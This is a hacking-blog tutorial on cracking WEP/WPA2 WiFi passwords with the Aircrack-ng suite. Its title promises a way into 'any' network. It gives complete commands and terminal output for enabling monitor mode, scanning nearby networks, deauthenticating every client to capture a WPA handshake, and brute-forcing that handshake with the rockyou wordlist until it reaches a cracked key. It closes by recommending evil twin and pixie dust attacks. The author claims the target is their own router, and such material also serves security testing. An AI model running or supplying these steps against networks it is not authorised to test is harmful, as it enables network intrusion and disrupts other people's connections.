Sploitech

How To Hack Any WEP/WPA2 Encrypted WiFi Using Aircrack-ng

WiFi Hacking Using Aircrack-ng

About The Tool

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third-party tools.
  • Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).

All tools are command lines that allow for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily on Linux but also Windows, macOS, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

Read More On Github

Tools & Software Required:

  • One System Capable Of Running Kali Linux. (I am using raspberry pi 400)
  • One router of your own to be hacked. (You can also use a mobile hotspot)
  • One WiFi adapter compatible with Linux which supports monitor mode and packet injection.
  • Aircrack-ng Software. (By default it would be installed)

Note: you can also use virtual machines to perform the hack but it requires a physical WiFi adapter.

(I recommend raspberry pi 400 or raspberry pi 3 because it comes with WiFi prebuilt)

Recommended RPI:

Recommended WiFi Cards:

  • Note: If you don’t know that both (Archer T2U Plus & TL-WN722N v2/v3 ) do not work properly with Linux it requires installing some additional drivers which are available on GitHub.
Driver installation guide & links:  These all links are tested with both of the WiFi adapters

Killing All Background Processes:

First, we need to kill all the processes that might interfere with the aircrack-ng suite. It is strongly recommended that these processes be eliminated prior to using the aircrack-ng suite. “check kill” will check and kill off processes that might interfere with the aircrack-ng suite.

  • Type: sudo airmon-ng check kill
				
					sudo airmon-ng check kill
				
			
				
					┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng check kill

Killing these processes:

    PID Name
    684 wpa_supplicant
				
			

Starting WiFi In Monitor Mode:

By default, the wifi card will be set to managed mode so we have to enable monitor mode on the wifi card we are using for attacking.

Note: It is very important to kill the network managers before putting a card in monitor mode.

  • Type: sudo airmon-ng start wlan0
				
					sudo airmon-ng start wlan0
				
			
				
					┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng start wlan0


PHY     Interface       Driver          Chipset

phy1    wlan0           8188eu          TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
                (monitor mode enabled)

				
			

Scanning For Nearby WiFi Networks:

Now we have to monitor all wireless networks, frequency hopping between all wireless channels. For that:

  • Type: sudo airodump-ng wlan0
				
					sudo airodump-ng wlan0
				
			
				
					 CH  1 ][ Elapsed: 18 s ][ 2021-08-20 12:50                                                                                          
                                                                                                                                     
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                     
                                                                                                                                     
 24:0B:88:AE:18:29  -40       73       58    2   2  130   WPA2 CCMP   PSK  Airtel                                         
 5A:95:D8:16:3A:B2  -61       87        0    0   6  130   WPA2 CCMP   PSK  <length:  0>                                              
 58:95:D8:26:3A:B2  -58       93        0    0   6  130   WPA2 CCMP   PSK  Bhandari-2G                                               
 C0:8F:20:28:0C:32  -93        5        0    0  11  130   WPA2 CCMP   PSK  Laxman                                                    
 A8:DA:0C:02:E7:A6  -86       22        0    0   6  130   WPA2 CCMP   PSK  psaaa#82                                                  
 AA:DA:0C:12:E7:A6  -86       27        0    0   6  130   WPA2 CCMP   PSK  <length:  0>                                              
                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                   
                                                                                                                                     
 24:0B:88:AE:18:29  E0:CC:F8:40:8B:E6  -80    1e- 1e     0       81                                                                  
 24:0B:88:AE:18:29  E0:13:B5:73:59:E3  -38    1e- 1     27      131                                                                  
Quitting...
				
			

After you will found your network press ctrl+c to exit.

CHThe channel number where wireless networks can send and receive data
BSSIDThe MAC address of the radio interface the client device is currently connected to
ENCEncryption or security on which device is working on 
ESSIDExtended Service Set Identification, which basically means the identifying name of the wireless network

Capturing WPA Handshake:

I am attacking Airtel (It is my own network). Now we have to copy the BSSID of the network we are attacking.

				
					sudo airodump-ng -c 2 --bssid 24:0B:88:AE:18:29 -w /home/kali/ wlan0
				
			
–bssidMAC address of a wireless access point(WAP).
-cChannel Number
-wThe Directory where you want to save the file(Password File).
wlan0Name of the interface.
				
					 CH  2 ][ Elapsed: 27 mins ][ 2021-08-21 11:49                                                                                       
                                                                                                                                     
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                 
                                                                                                                                     
 24:0B:88:AE:18:29  -42 100    15237   567903   14   2  130   WPA2 CCMP   PSK  Airtel                                     
                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                   
                                                                                                                                     
 24:0B:88:AE:18:29  E0:13:B5:73:59:E3  -42    1e- 1   1237   130458                                                                   24:0B:88:AE:18:29  E0:CC:F8:40:8B:E6  -84   24e- 1e     2    42157                                                                   24:0B:88:AE:18:29  1C:BF:C0:B5:78:57  -94    1e- 1     15   448988 
				
			

Now open a new terminal window to disconnect the clients connected to the target network. (!!Do Not Close The Current Window)

Kicking Clients Off The Network:

Once the client gets disconnected from the network he\she will try to reconnect but unfortunately won’t be able too and we will capture the password file he sent to the WiFi.

Now we have to disconnect all the clients from the network to capture the password file.

				
					sudo aireplay-ng -0 20 -a 24:0B:88:AE:18:29 wlan0
				
			
aireplay-ngTo inject frames
-0For deauthentication
10No. of deauthentication packets to be sent
-aFor the bssid of the target network
				
					┌──(kali㉿kali)-[~]
└─$ sudo aireplay-ng -0 20 -a 24:0B:88:AE:18:29 wlan0
12:34:10  Waiting for beacon frame (BSSID: 24:0B:88:AE:18:29) on channel 2
NB: this attack is more effective when targeting
a connected wireless client (-c client's mac).
12:34:10  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:11  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:11  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:12  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:13  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:13  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:14  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:14  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:15  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:16  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:16  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:17  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:17  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:18  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:18  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:19  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:20  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:20  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:21  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
12:34:21  Sending DeAuth (code 7) to broadcast -- BSSID: [24:0B:88:AE:18:29]
				
			

On the other terminal window we have successfully captured the WPA handshake and stored it in /home/kali/:

				
					 CH  2 ][ Elapsed: 4 mins ][ 2021-08-21 12:38 ][ WPA handshake: 24:0B:88:AE:18:29                                                    
                                                                                                                                     
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                 
                                                                                                                                     
 24:0B:88:AE:18:29  -44  92     2311      499    0   2  130   WPA2 CCMP   PSK  Airtel                                     
                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                   
                                                                                                                                     
 24:0B:88:AE:18:29  4A:05:F5:65:77:8F  -50    1e- 6e     0     1441  EAPOL  Airtel
				
			

Brute Force Using Aircrack-ng:

Now we have captured the WPA handshake and it is stored in the /home/kali/ directory. We have to brute force the WPA  handshake file with aircrack-ng we will be doing this brute force with the Rockyou.txt file. It by default comes with Kali Linux just needs to be extracted. 

  • Steps To extract the Rockyou.txt:
				
					#copy and paste this in terminal
cd /usr/share/wordlists
sudo gunzip rockyou.txt.gz
				
			

After you have unzipped the rockyou.txt you can Start the brute force: 

				
					sudo aircrack-ng -a2 -b 24:0B:88:AE:18:29 -w /usr/share/wordlists/rockyou.txt /home/kali/01.cap
				
			
-a-a2 for WPA2 & -a for WPA network
-bThe BSSID of the target network
-wLocation of the wordlist file
/home/kali/Location of the cap file
				
					.                               Aircrack-ng 1.6 

      [00:00:00] 474/10303727 keys tested (154.55 k/s) 

      Time left: 18 hours, 31 minutes, 10 seconds                0.00%

                           KEY FOUND! [ air64776 ]


      Master Key     : 3E 9C 7D 22 61 C0 FD FF 64 0B 01 D9 50 75 12 7A 
                       30 D4 44 22 A4 B3 FF 9C 1C 09 8B BA 69 9B 87 9E 

      Transient Key  : E0 8B EF DA 05 BD 4F 8A 60 E1 83 81 38 C1 17 61 
                       48 38 18 A4 37 70 79 56 A9 85 A5 98 62 A2 19 63 
                       40 DD DD B0 30 BC F1 60 3C 0D 9F F2 79 E9 37 22 
                       D7 94 19 76 A3 70 15 E6 A1 46 C8 D9 13 15 1F 00 

      EAPOL HMAC     : 89 3E 8D 44 16 B6 C1 F4 49 FE 76 89 7F 33 46 B0 
				
			

Conclusion

These types of attacks take too long to crack the password and they are always not successful instead of these attacks you can also use evil twin or pixie dust attack which will take less time and going to give you better results.

Liked This Article? Join Our Newsletter.

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.

Share It On:

Share on facebook
Facebook
Share on whatsapp
WhatsApp
Share on reddit
Reddit
Share on telegram
Telegram
Share on email
Email

COMMENTS:

Leave a Reply

Your email address will not be published. Required fields are marked *

You Might Also Like:

Want To Know About Latest Hacking Tricks?

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.